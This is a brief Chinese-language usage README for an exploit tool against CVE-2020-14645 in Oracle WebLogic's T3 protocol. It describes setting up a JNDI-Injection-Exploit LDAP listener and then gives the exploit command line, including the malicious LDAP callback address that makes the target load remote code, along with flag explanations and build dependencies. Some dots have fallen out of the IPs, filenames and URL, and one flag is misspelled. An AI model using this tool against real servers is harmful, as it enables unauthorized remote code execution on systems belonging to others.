CVE-2020-14645 使用方法 首先使用NDI-Injection-Exploit监听,并生成一个ldap地址。 java -jar WeblogicT3jar -Target 127001 -Port [7001] -RMI ldap://127001:1389/dozvtq [--SSL] -Tatget 和-RMI必填,https可使用--SSL参数,-Port默认7001。 自行编译需要添加coherencejar和wlfullclientjar 漏洞参考: mpweixinqqcom/s?__biz=MzUyMD